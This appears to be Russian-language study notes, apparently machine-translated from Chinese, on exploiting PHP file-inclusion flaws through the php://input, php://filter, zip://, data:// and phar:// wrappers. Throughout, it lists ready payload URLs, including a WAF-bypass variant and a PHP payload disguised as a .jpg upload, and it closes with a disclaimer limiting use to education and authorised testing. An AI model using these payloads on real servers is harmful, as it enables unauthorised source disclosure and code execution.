Используйте PHP для инкапсуляции псевдопротоколов

PHP имеет множество встроенных протоколов-оболочек в стиле URL, которые аналогичны функциям файловой системы fopen(), copy(), file_exists() и size().

ввод потока PHP

Используя концепцию потоков в PHP, исходный поток включаемого файла перенаправляется в управляемый пользователем входной поток.

Выполнение команды (allow_url_include:on,allow_url_fopen не требуется)

http://127.0.0.1/include/03/index.php?page=php://input

фильтр потока PHP

Чтение файлов (allow_url_include,allow_url_fopen не требуются)

?page=php://filter/read=convert.base64-encode/resource=index.php

Указав конец файла, вы можете прочитать исходный код файла в кодировке Base64, а затем декодировать его в формате Base64. Хотя вы не можете напрямую получить оболочку и т. д., возможность читать конфиденциальные файлы весьма вредна.

Другие позы:

?page=php://filter/convert.base64-encode/resource=index.php

Эффект тот же, что и раньше, без таких ключевых слов, как read. Может быть полезно при обходе некоторых wafs

zip://эксперимент

?page=zip://C:/Users/40454/Desktop/test.jpg%23test.txt

Сначала напишите код PHP, который будет выполняться, в виде файла с именем test.txt, zip test.txt и назовите сжатый файл test.zip. Если zip-файл можно загрузить, загрузите его напрямую. Если нет, переименуйте test.zip. в test.jpg и затем загрузите его.

При использовании протокола zip необходимо указать абсолютный путь. Использование относительного пути приведет к сбою; в то же время # будет закодирован как %23.

data://

Выполнение команды (версия PHP выше или равна 5.2,allow_url_include:on,allow_url_fopen:on)

?page=data://text/plain,<?php phpinfo();?>
?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

phar://

Если есть файл test.txt, запакуйте его в zip-архив и укажите абсолютный путь (или используйте относительный путь).

?page=phar://C:/Users/40454/Desktop/test.zip/test.txt
?page=phar://C:/Users/40454/Desktop/test.jpg/test.txt

краткое содержание

Некоторые изображения в этой статье взяты из учебного курса для сертифицированных инженеров службы безопасности Sangfor. Они предназначены для удобства личного изучения и использования и не предназначены для коммерческого использования! ! ! ! Текстовый контент набран лично мной, а не перенесен напрямую! Если есть какие-либо нарушения, пожалуйста, свяжитесь с нами, чтобы удалить их! ! !

Информация, представленная в этом документе, предназначена только дляОбразовательные цели и тестирование на проникновение с явным разрешением。Любое несанкционированное использование технической информации, содержащейся в этом документе, строго запрещено.,И может нарушать «Сетевой закон Китайской Народной Республики» и связанные с ним законы и правила. Пользователи должны использовать полученные знания законным и соответствующим требованиям образом.,Он не может использоваться для незаконного вторжения, разрушения информационных систем и других злонамеренных действий. Мы настоятельно рекомендуем всем читателям соблюдать местные законы и этические правила.,Исследуйте информационные технологии в пределах правовых границ.